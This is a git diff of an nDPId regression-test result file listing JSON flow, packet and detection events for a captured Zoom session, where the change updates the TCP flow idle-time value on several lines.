00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zoom2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1642965458402} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965458402,"flow_last_seen":1642965458402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642965458402,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"} -01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965458402,"flow_last_seen":1642965458402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642965458402,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642965458402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1642965458402,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngDAqAGykMNJmsOcAbton\/9jAAAAALAC\/\/+GrAAAAgQFtAEDAwUBAQgKBNjhZQAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642965458577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642965458577,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGrQSQw0mawKgBsgG7w5wp5A9SaJ\/\/ZKASqbBcNQAAAgQFrAQCCApc+vuKBNjhZQEDAww="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642965458577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642965458577,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGngzAqAGykMNJmsOcAbton\/9kKeQPU4AQECwj1wAAAQEICgTY4hFc+vuK"} +01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965459595,"flow_last_seen":1642965459595,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1642965459595,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642965459595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459595,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXeHsAAEARZSPAqAGykMNJmuztImEAgzNnAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hPwBvYT8AAABA5tdm9ZTyTIyTAkYLAufeKJLgneU8bl8DozakMMlr\/JDYAlm5+8RxsTcW0dGDYHnKojsP3MD2C2S9PgF8PPhtdgAAAAAAQABAAAB1MAABAAMAAiAA"} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642965459696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459696,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXZlQAAEARd0rAqAGykMNJmuztImEAg30SAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hpABvYaQAAABASNx7XNkhaVV2TkWPa7HXWfzTaegL7lyuofS42ADMsef1ZS+nG51oqDil0vt0Fn4zbdXfyiCV8oAbYGEn4LlcKwAAAAAAQABAAAB1MAABAAMAAiAA"} @@ -31,7 +31,7 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11812,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1642965500053,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA48ZAAAEAB7HzAqAGykMNJmgMD6XYAAAAARQAESyuFQAAxEX1lkMNJmsCoAbIiYeztBDcAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11815,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1642965500054,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500054,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4fvIAAEABXxvAqAGykMNJmgMD6XYAAAAARQAESyuHQAAxEX1jkMNJmsCoAbIiYeztBDcAAA=="} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":1642965460359,"flow_last_seen":1642965500043,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2230,"flow_first_seen":1642965460219,"flow_last_seen":1642965500203,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":368542,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8731,"flow_first_seen":1642965459595,"flow_last_seen":1642965500185,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1297,"flow_tot_l4_payload_len":7999131,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -- cgit v1.2.3